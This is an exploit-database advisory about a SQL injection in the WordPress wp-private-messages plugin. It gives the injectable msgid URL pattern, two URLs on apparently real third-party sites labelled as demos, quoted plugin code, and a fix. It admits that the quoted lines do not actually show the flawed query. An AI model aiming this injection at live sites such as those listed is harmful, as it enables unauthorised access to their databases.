The WordPress wp-private-messages plugin suffers from a SQL injection vulnerability.

#################################
# Iranian Exploit DataBase
# Www.exploit.IrIsT.Ir
#################################
# Exploit Title : WordPress wp-private-messages Plugin SQL Injection vulnerability
# Author : Iranian Exploit DataBase
# Discovered By : IeDb
# Home : http://exploit.IrIsT.Ir
# Software Link : http://wordpress.org/plugins/wp-private-messages/
# Security Risk : High
# Tested on : Linux
#################################
# Exploit :
# http://www.Site.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]
# Dem0 :
# http://renewedculture.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]
# http://www.rockfordravens.org/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]
#################################
# Vuln Source C0de :
# Line 145 :
# $messages = $wpdb->get_results("SELECT id, sender, subject, date, status FROM $wpdb->prefix".private_messages." WHERE rcpid = '".$current_user->ID."' AND tosee = 1 ORDER BY date DESC");
# And Line 160 :
# echo "<a href=\"?page=".dirname(plugin_basename(__FILE__))."/wpu_private_messages.php&wpu=reply&msgid=".$message->id."\"><img src=\"". get_settings('siteurl') . "/wp-content/plugins/".dirname(plugin_basename(__FILE__))."/icons/reply.png\" alt=\"Reply!\" title=\"".__('Reply!', $wpulang)."\"></a>";
# Note : Neither quoted line reads msgid. Line 145 interpolates only $current_user->ID, and line 160 only prints the reply link that carries msgid. The statement in the wpu=reply handler that consumes msgid is not quoted here; presumably it concatenates the value into a query in the same way.
# Note : The affected URL is under wp-admin/profile.php, so the request appears to require a logged-in session.
# Fix : Cast msgid to an integer (for example with absint()) and bind it through $wpdb->prepare() with a %d placeholder before it reaches any query.
#################################
# Exploit Archive : http://exploit.irist.ir/exploits-148.html
#################################